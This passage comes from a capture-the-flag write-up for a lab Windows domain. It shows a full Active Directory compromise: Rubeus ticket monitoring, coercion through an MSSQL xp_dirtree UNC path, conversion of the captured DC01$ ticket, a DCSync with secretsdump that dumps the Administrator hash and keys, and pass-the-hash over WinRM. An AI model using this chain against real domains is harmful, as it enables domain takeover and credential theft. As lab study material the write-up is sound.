.\Rubeus.exe monitor /interval:5
# ______ _
# (_____ \ | |
# _____) )_ _| |__ _____ _ _ ___
# | __ /| | | | _ \| ___ | | | |/___)
# | | \ \| |_| | |_) ) ____| |_| |___ |
# |_| |_|____/|____/|_____)____/(___/
#
# v2.3.3
#
# [*] Action: TGT Monitoring
# [*] Monitoring every 5 seconds for new TGTs
On first launch we see the TGTs for Administrator@DARKZERO.EXT, svc_sql, DC02$, so nothing really useful.
I tried a lot of stuff, including linux coercion tools (petitpotam, dfscoerce) none worked, I suspect the fact that DC02 is being forwarded via ligolo might break our coercion attempts, so instead I looked for Windows alternatives, I found SpoolSample.exe, using it we can perform the request and we see something happen in Inveigh, though no TGT appears again on the logs of Rubeus. I'm not too sure what is going on, it really seems like it works since Inveigh showed that requests are hitting.
After a lot of testing I came back to MSSQL, maybe we can force the internal MSSQL client to perform the coercion via an UNC path, I tried this:
EXEC master..xp_dirtree '\\DC02.darkzero.ext\foobar';
And a couple seconds later I saw the TGT appear in the rubeus logs:
# [*] 2/15/2026 11:37:34 AM UTC - Found new TGT:
#
# User : DC01$@DARKZERO.HTB
# StartTime : 2/15/2026 11:33:53 AM
# EndTime : 2/15/2026 9:33:53 PM
# RenewTill : 2/22/2026 11:33:53 AM
# Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
# Base64EncodedTicket :
#
# doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRn
# dBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZg1y1HMLsbUrDNAx1Jdt6h2TI27/LZxVK1tGrkhayDuJRm
# <SNIP>
From this we can decode the base64 to get the kirbi file and then use Impacket's ticketConverter to get a TGT, from that we should be able to DCSync:
echo "doIFjDCCBYigAwI<SNIP>kVSTy5IVEI=" | tr -d '\n' | base64 -d > dc01.kirbi
ticketConverter.py -i dc01.kirbi -o dc01.ccache
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies
#
# [*] converting kirbi to ccache...
# [+] done
export KRB5CCNAME=dc01.ccache
faketime "$(rdate -n 10.129.3.164 -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh
secretsdump -k -no-pass 'DC01$@dc01.darkzero.htb' -dc-ip 10.129.3.164 -use-ntds -just-dc-user Administrator
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies
#
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
# [*] Kerberos keys grabbed
# Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
# Administrator:0x13:a23315d970fe9d556be03ab611730673
# Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
# Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
# Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
# [*] Cleaning up...
We got it, let's connect and get the flag:
evil-winrmexec "Administrator@DC01" -hashes ":5917507bdf2ef2c2b0a869a1cba40726"
# [*] '-target_ip' not specified, using DC01
# [*] '-port' not specified, using 5985
# [*] '-url' not specified, using http://DC01:5985/wsman
cd ../Desktop
dir
# Directory: C:\Users\Administrator\Desktop
#
#
# Mode LastWriteTime Length Name
# ---- ------------- ------ ----
# -ar--- 2/15/2026 8:57 AM 34 root.txt
# -ar--- 2/15/2026 8:57 AM 34 user.txt
type root.txt
# <REDACATED>
Not sure why there's another user.txt there.